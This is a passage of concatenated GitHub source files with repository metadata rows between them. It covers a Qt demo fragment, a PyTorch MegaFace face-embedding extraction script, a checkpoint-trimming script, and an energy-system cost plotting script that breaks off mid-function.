        self.progressBar.setValue(0)
        timer = QTimer(self)
        timer.timeout.connect(self.advanceProgressBar)
        timer.start(1000)
| me701/norwegianwood | demo_qtmodern/widgetgallery.py | widgetgallery.py | py | 8,059 | python | en | code | 0 | github-code | 13 |
23607494022 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import os.path
import struct
import sys
import numpy as np
import cv2
# from easydict import EasyDict as edict
import torch
import sklearn
from sklearn import preprocessing
from sklearn.decomposition import PCA
# from models import MobileFaceNet
# sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
# import face_preprocess
# import facenet
# import lfw
# from caffe.proto import caffe_pb2
import torch.backends.cudnn as cudnn
from torchvision import transforms
import pickle
from insightface_v2.model.models import MobileFaceNet, resnet34
from insightface_v2.model.mobilefacenetv2.mobilefacenetv2_v3_width import Mobilefacenetv2_v3_width
from insightface_v2.model.mobilefacenet_pruned import pruned_Mobilefacenet
from insightface_v2.model.mobilefacenetv2_width_wm import Mobilefacenetv2_width_wm
from insightface_v2.model.insightface_resnet import LResNet34E_IR
from insightface_v2.model.insightface_resnet_pruned import pruned_LResNet34E_IR
def de_preprocess(tensor):
    """Invert the input normalisation: scale by 0.501960784 (~128/255)
    and shift by 0.5, mapping values from roughly [-1, 1] back to [0, 1]."""
    scale = 0.501960784
    offset = 0.5
    return tensor * scale + offset
# Test-time horizontal-flip pipeline: undo the mean/std normalisation,
# round-trip through PIL to mirror the image, then re-apply the same
# Normalize(mean=0.5, std=0.501960784) per channel.
hflip = transforms.Compose([
    de_preprocess,
    transforms.ToPILImage(),
    transforms.functional.hflip,
    transforms.ToTensor(),
    transforms.Normalize([0.5, 0.5, 0.5], [0.501960784, 0.501960784, 0.501960784])
])
def hflip_batch(imgs_tensor):
    # Horizontally flip every image of a batch tensor, returning a new
    # tensor of the same shape/dtype; each image goes through `hflip`.
    hfliped_imgs = torch.empty_like(imgs_tensor)
    for i, img_ten in enumerate(imgs_tensor):
        hfliped_imgs[i] = hflip(img_ten)
    return hfliped_imgs
def write_bin(path, feature):
    """Serialise a feature vector to the MegaFace-devkit binary layout:
    a header of four ints (length, 1, 4, 5) followed by float32 values."""
    values = list(feature)
    header = struct.pack('4i', len(values), 1, 4, 5)
    payload = struct.pack("%df" % len(values), *values)
    with open(path, 'wb') as out:
        out.write(header)
        out.write(payload)
def parse_lst_line(line):
    """Parse one tab-separated line of an aligned-dataset .lst file.

    Layout: aligned flag, image path, integer label, then optionally four
    bbox ints (fields 3..6) and optionally ten landmark floats
    (fields 7..16, reshaped (2, 5) and transposed to a 5x2 array).

    Returns (image_path, label, bbox, landmark, aligned); bbox/landmark
    are None when their fields are absent.
    """
    fields = line.strip().split("\t")
    assert len(fields) >= 3
    aligned = int(fields[0])   # is or not aligned
    image_path = fields[1]     # aligned image path
    label = int(fields[2])     # numeric identity label
    bbox = None
    landmark = None
    if len(fields) > 3:
        bbox = np.array([int(v) for v in fields[3:7]], dtype=np.int32)
        landmark = None
        if len(fields) > 7:
            coords = [float(v) for v in fields[7:17]]
            landmark = np.array(coords).reshape((2, 5)).T
    return image_path, label, bbox, landmark, aligned
def read_image(img_path):
    # Load an image from disk (OpenCV reads BGR) and convert to RGB so the
    # channel order matches the rest of the feature pipeline.
    img = cv2.imread(img_path, cv2.IMREAD_COLOR)
    # print(type(img))
    img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    return img
def get_feature(image_path, model, image_shape, use_flip=True):
    """Compute an L2-normalised embedding for a single image.

    image_shape is (channels, height, width); pixels are normalised as
    (x - 127.5) * 0.0078125 and laid out CHW with a leading batch dim.
    With use_flip, the features of the image and its horizontal flip are
    summed before normalisation. Returns a flat numpy vector, or None if
    the image cannot be read. Requires a CUDA device.
    """
    img = read_image(image_path)
    # print(img.shape)
    if img is None:
        print('parse image', image_path, 'error')
        return None
    assert img.shape == (image_shape[1], image_shape[2], image_shape[0])
    v_mean = np.array([127.5, 127.5, 127.5], dtype=np.float32).reshape((1, 1, 3))
    img = img.astype(np.float32) - v_mean
    img *= 0.0078125
    img = np.transpose(img, (2, 0, 1))
    img = torch.tensor(img.reshape(1, img.shape[0], img.shape[1], img.shape[2]))
    # print('image size:', img.size())
    F = model(img.cuda())
    print('use_flip={}'.format(use_flip))
    if use_flip:
        fliped_img = hflip_batch(img)
        fliped_F = model(fliped_img.cuda())
        F = F + fliped_F
    F = F.data.cpu().numpy().flatten()
    _norm = np.linalg.norm(F)
    F /= _norm
    # print(F.shape)
    return F
def get_image_path(image_path, dataser_path, split_str):
    """Re-root *image_path* under *dataser_path*: keep only the part after
    the single occurrence of *split_str* and join it onto the new root.

    Raises ValueError if *split_str* does not split the path into exactly
    two pieces.
    """
    _prefix, relative = image_path.split(split_str)
    return os.path.join(dataser_path, relative)
def get_batch_feature(img_path_list, model, image_shape, use_flip=True):
    """Compute row-wise L2-normalised embeddings for a list of images.

    Same preprocessing as get_feature ((x - 127.5) * 0.0078125, CHW), but
    batched into one forward pass. With use_flip, features of the flipped
    batch are added before normalisation. Returns an (N, D) numpy array,
    or None if any image fails to load. Requires a CUDA device.
    """
    batch_img = np.zeros([len(img_path_list), image_shape[0], image_shape[1], image_shape[2]])
    # print("batch_img shape={}".format(batch_img.shape))
    for i in range(len(img_path_list)):
        img = read_image(img_path_list[i])
        # print(img.shape)
        if img is None:
            print('parse image', img_path_list[i], 'error')
            return None
        assert img.shape == (image_shape[1], image_shape[2], image_shape[0])
        v_mean = np.array([127.5, 127.5, 127.5], dtype=np.float32).reshape((1, 1, 3))
        img = img.astype(np.float32) - v_mean
        img *= 0.0078125
        img = np.transpose(img, (2, 0, 1))
        batch_img[i, ...] = img
    batch_img = torch.tensor(batch_img).float()
    F = model(batch_img.cuda())
    print('use_flip={}'.format(use_flip))
    if use_flip:
        fliped_batch_img = hflip_batch(batch_img)
        fliped_F = model(fliped_batch_img.cuda())
        F = F + fliped_F
    F = F.data.cpu().numpy()
    F = sklearn.preprocessing.normalize(F)
    # print(F.shape)
    return F
def process_batch_feature(args, image_path_list, megaface_out, dataset_path, model, image_shape, use_flip):
    """Extract features for a batch of MegaFace images and write one .bin
    per image under megaface_out, mirroring the last two path components
    (<a1>/<a2>/<name>_<algo>_<H>x<W>.bin). Returns the number written.
    """
    img_path_list = []
    out_dir_list = []
    b_list = []
    count = 0
    for i in range(len(image_path_list)):
        # Mirror the trailing <a1>/<a2>/<file> structure into the output dir.
        _path = image_path_list[i].split('/')
        a1, a2, b = _path[-3], _path[-2], _path[-1]
        out_dir = os.path.join(megaface_out, a1, a2)
        out_dir_list.append(out_dir)
        b_list.append(b)
        image_path = get_image_path(image_path_list[i], dataset_path, "MegaFace/")
        img_path_list.append(image_path)
    feature = get_batch_feature(img_path_list, model, image_shape, use_flip)
    # print("img_path_list len={}, out_dir_list len={}, b_list len={}".format(len(img_path_list), len(out_dir_list), len(b_list)))
    for i in range(len(img_path_list)):
        # print("i={}, {}".format(i, img_path_list[i]))
        if not os.path.exists(out_dir_list[i]):
            os.makedirs(out_dir_list[i])
        out_path = os.path.join(out_dir_list[i], b_list[i] + "_%s_%dx%d.bin" % (args.algo, image_shape[1], image_shape[2]))
        # print(out_path)
        write_bin(out_path, feature[i].flatten())
        count += 1
    return count
def main(args):
    """Export face embeddings in MegaFace devkit format.

    Loads an adaptively pruned MobileFaceNet (topology unpickled from
    ``model.txt``, weights from ``checkpoint_022.pth``) and writes one
    L2-normalized feature ``.bin`` per image: the FaceScrub probe set is
    processed image-by-image, the MegaFace distractor set in batches.

    Args:
        args: parsed command-line namespace (see parse_arguments); uses
            gpu, image_size, skip, mf, batch_size, algo and use_flip.
    """
    print(args)
    # Pin the process to the requested GPU before any CUDA work happens.
    os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu
    cudnn.benchmark = True
    image_shape = [int(x) for x in args.image_size.split(',')]  # [C, H, W]

    # Input lists / dataset root on the storage server.
    megaface_lst = "/home/dataset/xz_datasets/Megaface/Mageface_aligned/megaface_112x112/lst"
    facescrub_lst = "/home/dataset/xz_datasets/Megaface/Mageface_aligned/Challenge1/facescrub_112x112_v2/small_lst"
    dataset_path = "/home/dataset/xz_datasets/Megaface/Mageface_aligned"

    # Output locations and checkpoint for the current experiment (ms1mv2,
    # adaptively pruned MobileFaceNet, checkpoint 22).  Earlier experiments
    # (r34, pruned variants, ICCV ms1m runs) used different paths and model
    # constructors; switch these assignments and the model construction below
    # to reproduce them.
    megaface_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_mobilefacenet_prun_adapt/' \
                   'pytorch_mobilefacenet_without_p_fc_adapt_checkpoint22_s128_fliped/' \
                   'fp_megaface_112x112_norm_features'
    facescrub_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_mobilefacenet_prun_adapt/' \
                    'pytorch_mobilefacenet_without_p_fc_adapt_checkpoint22_s128_fliped/' \
                    'fp_facescrub_112x112_norm_features'
    check_point_params = torch.load('/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_mobilefacenet_prun_adapt/checkpoint_022.pth', map_location=torch.device('cpu'))
    print("megaface_out = ", megaface_out)
    print("facescrub_out = ", facescrub_out)

    # The pruned network topology is stored as a pickled nn.Module, so the
    # structure is unpickled first and the trained weights loaded into it.
    # NOTE(review): pickle.load is only acceptable here because model.txt is
    # a trusted local artifact.
    with open('/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_mobilefacenet_prun_adapt/model.txt', 'rb') as f:
        model = pickle.load(f)
    model_state = check_point_params['model']
    print(model)
    model.load_state_dict(model_state)
    print("model load success !!!")
    model = model.cuda()
    model.eval()

    if args.skip == 0:
        i = 0
        succ = 0
        print("get facescrub features start!")
        # FaceScrub probes: one feature per image at <out>/<person>/<file>.bin.
        with open(facescrub_lst, 'r') as lst_file:
            for line in lst_file:
                if i % 1000 == 0:
                    print("writing facescrub", i, succ)
                    print('i=', str(i))
                image_path, label, bbox, landmark, aligned = parse_lst_line(line)
                _path = image_path.split('/')
                a, b = _path[-2], _path[-1]
                out_dir = os.path.join(facescrub_out, a)
                if not os.path.exists(out_dir):
                    os.makedirs(out_dir)
                image_path = get_image_path(image_path, dataset_path, "MegaFace/")
                print(image_path)
                feature = get_feature(image_path, model, image_shape, args.use_flip)
                out_path = os.path.join(out_dir, b + "_%s_%dx%d.bin" % (args.algo, image_shape[1], image_shape[2]))
                write_bin(out_path, feature)
                succ += 1
                i += 1
        print('facescrub finish!', i, succ)
    if args.mf == 0:
        return

    # MegaFace distractors: batched extraction for throughput.
    i = 0
    succ = 0
    batch_count = 0
    image_path_list = []
    print("get megaface features start!")
    with open(megaface_lst, 'r') as lst_file:
        for line in lst_file:
            if i % 1000 == 0:
                print("writing megaface", i, succ)
                print('i={}, succ={}'.format(i, succ))
            image_path, label, bbox, landmark, aligned = parse_lst_line(line)
            image_path_list.append(image_path)
            if (i + 1) % args.batch_size == 0:
                batch_count += 1
                print("batch count={}".format(batch_count))
                count = process_batch_feature(args, image_path_list, megaface_out,
                                              dataset_path, model, image_shape, args.use_flip)
                succ += count
                image_path_list = []
            i += 1
    # Flush the final partial batch, if any.
    if len(image_path_list) != 0:
        count = process_batch_feature(args, image_path_list, megaface_out, dataset_path,
                                      model, image_shape, args.use_flip)
        succ += count
    print('mf stat', i, succ)
    print(args)
def _str2bool(value):
    """Interpret a command-line string as a boolean (case-insensitive)."""
    if isinstance(value, bool):
        return value
    return value.lower() in ('true', '1', 'yes', 'y')


def parse_arguments(argv):
    """Parse command-line options for the feature-extraction run.

    Args:
        argv: argument list without the program name (sys.argv[1:]).

    Returns:
        argparse.Namespace with batch_size, image_size, skip, mf, algo,
        gpu and use_flip.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--batch_size', type=int, help='', default=64)
    parser.add_argument('--image_size', type=str, help='', default='3,112,112')
    parser.add_argument('--skip', type=int, help='', default=0)
    parser.add_argument('--mf', type=int, help='', default=1)
    parser.add_argument('--algo', type=str, help='', default='mobilefacenetPytorch')
    parser.add_argument('--gpu', type=str, help='gpu', default='1')
    # argparse's type=bool is a trap: bool('False') is True because any
    # non-empty string is truthy, so '--use_flip False' silently enabled
    # flipping.  Parse the string explicitly instead.
    parser.add_argument('--use_flip', type=_str2bool, help='use_flip', default=True)
    return parser.parse_args(argv)
if __name__ == '__main__':
    # Entry point: forward the CLI arguments (without the program name) to main().
    main(parse_arguments(sys.argv[1:]))
| CN1Ember/feathernet_mine | quan_table/insightface_v2/megaface/fast_gen_megaface_pytorch_flip.py | fast_gen_megaface_pytorch_flip.py | py | 22,020 | python | en | code | 1 | github-code | 13 |
31767138079 | # cut the embed head in current pth file
# Strip the embedding head from a saved checkpoint: every state-dict entry
# whose name contains "embed_" is dropped so the remaining weights can be
# reloaded into a model without that head.
import os
import torch
path = "ArT_mid/MixNet_FSNet_M_160.pth"
cpt = torch.load(path)
model_cpt = cpt["model"]
print(model_cpt.keys())
# Materialize the key list first because the dict is mutated while filtering.
keys_list = list(model_cpt.keys())
for key in keys_list:
    if "embed_" in key:
        model_cpt.pop(key)
print(model_cpt.keys())
cpt["model"] = model_cpt
torch.save(cpt, "MixNet_FSNet_M_160.pth") | D641593/MixNet | model/cut_pth.py | cut_pth.py | py | 380 | python | en | code | 26 | github-code | 13 |
72396604499 | import numpy as np
import pickle, os
from scipy import stats
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import scipy.stats as st
if __name__ == "__main__":
base_to_PGP = -999
base_from_PGP = -999
"""
def plot_cost(CurrentCase, ylist_type, default_case_name):
ax = plt.subplot(111)
if ylist_type == 'PGP':
x_axis = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
y_lists = [np.array(CurrentCase['natgas_tot']), np.array(CurrentCase['natgas_ccs_tot']), np.array(CurrentCase['biopower_tot']),
np.array(CurrentCase['solar_fix']), np.array(CurrentCase['wind_fix']), np.array(CurrentCase['offwind_fix']),
np.array(CurrentCase['nuclear_fix']), np.array(CurrentCase['geothermal_fix']),
np.array(CurrentCase['storage_fix']),
np.array(CurrentCase['to_PGP_fix']) + np.array(CurrentCase['PGP_storage_fix']) + np.array(CurrentCase['from_PGP_fix'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink', 'lightgreen']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlabel('PGP cost scale (%)', fontsize=14)
ax.set_ylabel('System cost ($/kWh)', fontsize=14)
ax.xaxis.labelpad = 8
ax.yaxis.labelpad = 8
ax.set_xticks( x_axis )
ax.set_xticklabels( x_axis )
ax.set_xlim(0.1, 1)
# ax.set_xscale('log', basex=10)
ax.set_ylim(0, 0.12)
# plt.show()
plt.savefig(default_case_name+'.ps')
plt.clf()
if ylist_type == 'DAC':
x_axis = [0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
y_lists = [np.array(CurrentCase['natgas_tot']), np.array(CurrentCase['natgas_ccs_tot']), np.array(CurrentCase['biopower_tot']),
np.array(CurrentCase['solar_fix']), np.array(CurrentCase['wind_fix']), np.array(CurrentCase['offwind_fix']),
np.array(CurrentCase['nuclear_fix']), np.array(CurrentCase['geothermal_fix']),
np.array(CurrentCase['storage_fix']),
np.array(CurrentCase['dac_tot'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink', 'lightgreen']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlabel('PGP cost scale (%)', fontsize=14)
ax.set_ylabel('System cost ($/kWh)', fontsize=14)
ax.xaxis.labelpad = 8
ax.yaxis.labelpad = 8
ax.set_xticks( x_axis )
ax.set_xticklabels( x_axis )
ax.set_xlim(0.01, 1)
ax.set_xscale('log', basex=10)
ax.set_ylim(0, 0.12)
# plt.show()
plt.savefig(default_case_name+'.ps')
plt.clf()
if ylist_type == 'demand':
xlist = np.array([100, 98, 96, 94, 92, 90, 88, 86, 84, 82, 80, 78, 76, 74, 72, 70, 68, 66, 64, 62, 60, 58, 56, 54, 52, 50, 48, 46, 44, 42,
40, 38, 36, 34, 32, 30, 28, 26, 24, 22, 20, 18, 16, 14, 12, 10, 8, 6, 4, 2, 1, 0.1, 0.01, 0])/100
x_axis = 1 - 0.5**( np.log(xlist)/np.log(0.2) )
xticks_addition_org = np.array([50.0, 10.0, 1.0])/100
xticks_addition_cov = 1 - 0.5**( np.log(xticks_addition_org)/np.log(0.2) )
xticks = np.r_[[0, 0.5, 0.75, 1.0], xticks_addition_cov]
y_lists = [np.array(CurrentCase['natgas_tot']), np.array(CurrentCase['natgas_ccs_tot']), np.array(CurrentCase['biopower_tot']),
np.array(CurrentCase['solar_fix']), np.array(CurrentCase['wind_fix']), np.array(CurrentCase['offwind_fix']),
np.array(CurrentCase['nuclear_fix']), np.array(CurrentCase['geothermal_fix']),
np.array(CurrentCase['storage_fix'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlabel('Emissions reduction constration (%)', fontsize=14)
ax.set_ylabel('System cost ($/kWh)', fontsize=14)
ax.xaxis.labelpad = 8
ax.yaxis.labelpad = 8
ax.set_xticks( xticks )
ax.set_xticklabels( ['0', '80', '96', '100', '50', '90', '99'] )
ax.set_xlim(0, 1)
ax.set_ylim(0, 0.14)
# plt.show()
plt.savefig(default_case_name+'.ps')
plt.clf()
if ylist_type == 'GeoCap':
x_axis = np.array([0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5])
y_lists = [np.array(CurrentCase['natgas_tot']), np.array(CurrentCase['natgas_ccs_tot']), np.array(CurrentCase['biopower_tot']),
np.array(CurrentCase['solar_fix']), np.array(CurrentCase['wind_fix']), np.array(CurrentCase['offwind_fix']),
np.array(CurrentCase['nuclear_fix']), np.array(CurrentCase['geothermal_fix']),
np.array(CurrentCase['storage_fix'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlim(0, 1.5)
ax.set_ylim(0, 0.10)
plt.show()
# plt.savefig(default_case_name+'.ps')
plt.clf()
with open('Cost_Uncertainty_PGP_scale.pickle', 'rb') as handle:
table_dispatch_ToPGP, table_dispatch_FromPGP, table_dispatch_AllPGP = pickle.load(handle)
# # plot_cost(table_dispatch_ToPGP[0], 'PGP', 'tPGP2019')
# plot_cost(table_dispatch_ToPGP[1], 'PGP', 'tPGP2050_sub0')
# plot_cost(table_dispatch_ToPGP[2], 'PGP', 'tPGP2050_sub1')
# plot_cost(table_dispatch_ToPGP[3], 'PGP', 'tPGP2050_sub2')
# plot_cost(table_dispatch_ToPGP[4], 'PGP', 'tPGP2050_sub3')
# plot_cost(table_dispatch_ToPGP[5], 'PGP', 'tPGP2050_sub4')
# # plot_cost(table_dispatch_FromPGP[0], 'PGP', 'fPGP2019')
# plot_cost(table_dispatch_FromPGP[1], 'PGP', 'fPGP2050_sub0')
# plot_cost(table_dispatch_FromPGP[2], 'PGP', 'fPGP2050_sub1')
# plot_cost(table_dispatch_FromPGP[3], 'PGP', 'fPGP2050_sub2')
# plot_cost(table_dispatch_FromPGP[4], 'PGP', 'fPGP2050_sub3')
# plot_cost(table_dispatch_FromPGP[5], 'PGP', 'fPGP2050_sub4')
# # plot_cost(table_dispatch_AllPGP[0], 'PGP', 'aPGP2019')
# plot_cost(table_dispatch_AllPGP[1], 'PGP', 'aPGP2050_sub0')
# plot_cost(table_dispatch_AllPGP[2], 'PGP', 'aPGP2050_sub1')
# plot_cost(table_dispatch_AllPGP[3], 'PGP', 'aPGP2050_sub2')
# plot_cost(table_dispatch_AllPGP[4], 'PGP', 'aPGP2050_sub3')
# plot_cost(table_dispatch_AllPGP[5], 'PGP', 'aPGP2050_sub4')
with open('Cost_Uncertainty_Dac_scale.pickle', 'rb') as handle:
table_dispatch_DAC = pickle.load(handle)
# plot_cost(table_dispatch_DAC[0], 'DAC', 'DAC2019')
# plot_cost(table_dispatch_DAC[1], 'DAC', 'DAC2050_sub0')
# plot_cost(table_dispatch_DAC[2], 'DAC', 'DAC2050_sub1')
# plot_cost(table_dispatch_DAC[3], 'DAC', 'DAC2050_sub2')
# plot_cost(table_dispatch_DAC[4], 'DAC', 'DAC2050_sub3')
# plot_cost(table_dispatch_DAC[5], 'DAC', 'DAC2050_sub4')
with open('Cost_Uncertainty_Demand.pickle', 'rb') as handle:
Table_ESF2050, Table_square = pickle.load(handle)
# plot_cost(Table_ESF2050[0], 'demand', 'ESF2050_2019')
# plot_cost(Table_ESF2050[1], 'demand', 'ESF2050_2050_sub0')
# plot_cost(Table_ESF2050[2], 'demand', 'ESF2050_2050_sub1')
# plot_cost(Table_ESF2050[3], 'demand', 'ESF2050_2050_sub2')
# plot_cost(Table_ESF2050[4], 'demand', 'ESF2050_2050_sub3')
# plot_cost(Table_ESF2050[5], 'demand', 'ESF2050_2050_sub4')
# plot_cost(Table_square[0], 'demand', 'square_2019')
# plot_cost(Table_square[1], 'demand', 'square_2050_sub0')
# plot_cost(Table_square[2], 'demand', 'square_2050_sub1')
# plot_cost(Table_square[3], 'demand', 'square_2050_sub2')
# plot_cost(Table_square[4], 'demand', 'square_2050_sub3')
# plot_cost(Table_square[5], 'demand', 'square_2050_sub4')
# with open('Cost_Uncertainty_GeoCapLimit.pickle', 'rb') as handle:
# table_dispatch_GeoCap = pickle.load(handle)
# plot_cost(table_dispatch_GeoCap[0], 'GeoCap', 'ER10')
# plot_cost(table_dispatch_GeoCap[1], 'GeoCap', 'ER1')
# plot_cost(table_dispatch_GeoCap[2], 'GeoCap', 'ER0')
# """
"""
color_colors = {'natgas': 'black', 'natgas_ccs': 'grey', 'biopower': 'lightslategrey',
'solar': 'wheat', 'wind': 'skyblue', 'offwind': 'darkblue',
'nuclear': 'tomato', 'geothermal': 'darkred',
'storage': 'lightpink', 'pgp': 'lightgreen'}
def system_cost_distribution(table_in):
bin_edges = list(np.arange(0.05, 0.101, 0.001))
tech_list_Full = ['solar', 'wind', 'offwind', 'geothermal', 'storage']
system_cost = np.array(table_in['system_cost'])
cost_tables = table_in['cost']
for tech_idx in tech_list_Full:
tech_cap = np.array(table_in[tech_idx+'_cap'])
tech_fixed_cost = np.array(cost_tables[tech_idx+'_fix'])
tech_fixed_cost_unique = np.unique(tech_fixed_cost)
if len(tech_fixed_cost_unique) == 3:
list_1, list_2, list_3 = [], [], []
caps_1, caps_2, caps_3 = [], [], []
for idx in range(len(tech_fixed_cost)):
if tech_fixed_cost[idx] == tech_fixed_cost_unique[0]: list_1.append(system_cost[idx])
if tech_fixed_cost[idx] == tech_fixed_cost_unique[1]: list_2.append(system_cost[idx])
if tech_fixed_cost[idx] == tech_fixed_cost_unique[2]: list_3.append(system_cost[idx])
ax1 = plt.subplot(111)
x_axis = np.arange(0.05, 0.101, 0.001)
try:
kde_L = st.gaussian_kde(list_1); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_L.pdf(x_axis)*0.001, facecolor='#fdf289', edgecolor='#fdf289', linestyle='--', linewidth=0.8, alpha=0.5, label='L')
except:
print ('no L')
try:
kde_M = st.gaussian_kde(list_2); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_M.pdf(x_axis)*0.001, facecolor='#46edc8', edgecolor='#46edc8', linestyle='--', linewidth=0.8, alpha=0.5, label='M')
except:
print ('no M')
try:
kde_H = st.gaussian_kde(list_3); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_H.pdf(x_axis)*0.001, facecolor='#374d7c', edgecolor='#374d7c', linestyle='--', linewidth=0.8, alpha=0.5, label='H')
except:
print ('no H')
ax1 = plt.subplot(111)
ax1.boxplot(caps_1, positions=[1], widths=0.6, medianprops=dict(color=color_colors[tech_idx]))
ax1.boxplot(caps_2, positions=[2], widths=0.6, medianprops=dict(color=color_colors[tech_idx]))
ax1.boxplot(caps_3, positions=[3], widths=0.6, medianprops=dict(color=color_colors[tech_idx]))
ax1.set_xlim(0.05, 0.1)
ax1.set_ylim(0, 0.15)
# plt.show()
plt.savefig(f'panel_low_{tech_idx}.ps')
plt.clf()
# with open('Cost_Uncertainty_GeoCapEnsemble.pickle', 'rb') as handle:
# Table_scenario2050_GeoCap = pickle.load(handle)
# system_cost_distribution(Table_scenario2050_GeoCap[0])
# system_cost_distribution(Table_scenario2050_GeoCap[1])
# system_cost_distribution(Table_scenario2050_GeoCap[2])
# """
"""
def plot_transient(CurrentCase, default_case_name):
ax = plt.subplot(111)
x_axis = np.arange(2019, 2051, 1)
y_lists = [np.array(CurrentCase['natgas_tot']) + np.array(CurrentCase['natgas_fixed_tot']),
np.array(CurrentCase['natgas_ccs_tot']) + np.array(CurrentCase['natgas_ccs_fixed_tot']),
np.array(CurrentCase['biopower_tot']) + np.array(CurrentCase['biopower_fixed_tot']),
np.array(CurrentCase['solar_fix']) + np.array(CurrentCase['solar_fixed_fix']),
np.array(CurrentCase['wind_fix']) + np.array(CurrentCase['wind_fixed_fix']),
np.array(CurrentCase['offwind_fix']) + np.array(CurrentCase['offwind_fixed_fix']),
np.array(CurrentCase['nuclear_fix']) + np.array(CurrentCase['nuclear_fixed_fix']),
np.array(CurrentCase['geothermal_fix']) + np.array(CurrentCase['geothermal_fixed_fix']),
np.array(CurrentCase['storage_fix']) + np.array(CurrentCase['storage_fixed_fix'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlabel('PGP cost scale (%)', fontsize=14)
ax.set_ylabel('System cost ($/kWh)', fontsize=14)
ax.xaxis.labelpad = 8
ax.yaxis.labelpad = 8
ax.set_xticks( x_axis )
ax.set_xticklabels( x_axis )
ax.set_xlim(2019, 2050)
ax.set_ylim(0, 0.12)
# plt.show()
plt.savefig(default_case_name+'.ps')
plt.clf()
def plot_right_panel_bar(CurrentCase, type, name):
ax = plt.subplot(111)
bot = 0
if type == 0:
ax.bar(0, np.array(CurrentCase['natgas_tot'][-1]) + np.array(CurrentCase['natgas_fixed_tot'][-1]), bottom = bot, color='black'); bot = bot + CurrentCase['natgas_tot'][-1] + np.array(CurrentCase['natgas_fixed_tot'][-1])
ax.bar(0, np.array(CurrentCase['natgas_ccs_tot'][-1]) + np.array(CurrentCase['natgas_ccs_fixed_tot'][-1]), bottom = bot, color='grey'); bot = bot + CurrentCase['natgas_ccs_tot'][-1] + np.array(CurrentCase['natgas_ccs_fixed_tot'][-1])
ax.bar(0, np.array(CurrentCase['biopower_tot'][-1]) + np.array(CurrentCase['biopower_fixed_tot'][-1]), bottom = bot, color='lightslategrey'); bot = bot + CurrentCase['biopower_tot'][-1] + np.array(CurrentCase['biopower_fixed_tot'][-1])
ax.bar(0, np.array(CurrentCase['solar_fix'][-1]) + np.array(CurrentCase['solar_fixed_fix'][-1]), bottom = bot, color='wheat'); bot = bot + CurrentCase['solar_fix'][-1] + np.array(CurrentCase['solar_fixed_fix'][-1])
ax.bar(0, np.array(CurrentCase['wind_fix'][-1]) + np.array(CurrentCase['wind_fixed_fix'][-1]), bottom = bot, color='skyblue'); bot = bot + CurrentCase['wind_fix'][-1] + np.array(CurrentCase['wind_fixed_fix'][-1])
ax.bar(0, np.array(CurrentCase['offwind_fix'][-1]) + np.array(CurrentCase['offwind_fixed_fix'][-1]), bottom = bot, color='darkblue'); bot = bot + CurrentCase['offwind_fix'][-1] + np.array(CurrentCase['offwind_fixed_fix'][-1])
ax.bar(0, np.array(CurrentCase['nuclear_fix'][-1]) + np.array(CurrentCase['nuclear_fixed_fix'][-1]), bottom = bot, color='tomato'); bot = bot + CurrentCase['nuclear_fix'][-1] + np.array(CurrentCase['nuclear_fixed_fix'][-1])
ax.bar(0, np.array(CurrentCase['geothermal_fix'][-1]) + np.array(CurrentCase['geothermal_fixed_fix'][-1]), bottom = bot, color='brown'); bot = bot + CurrentCase['geothermal_fix'][-1] + np.array(CurrentCase['geothermal_fixed_fix'][-1])
ax.bar(0, np.array(CurrentCase['storage_fix'][-1]) + np.array(CurrentCase['storage_fixed_fix'][-1]), bottom = bot, color='lightpink'); bot = bot + CurrentCase['storage_fix'][-1] + np.array(CurrentCase['storage_fixed_fix'][-1])
if type == 1:
ax.bar(0, np.array(CurrentCase['natgas_tot'][-1]), bottom = bot, color='black'); bot = bot + CurrentCase['natgas_tot'][-1]
ax.bar(0, np.array(CurrentCase['natgas_ccs_tot'][-1]), bottom = bot, color='grey'); bot = bot + CurrentCase['natgas_ccs_tot'][-1]
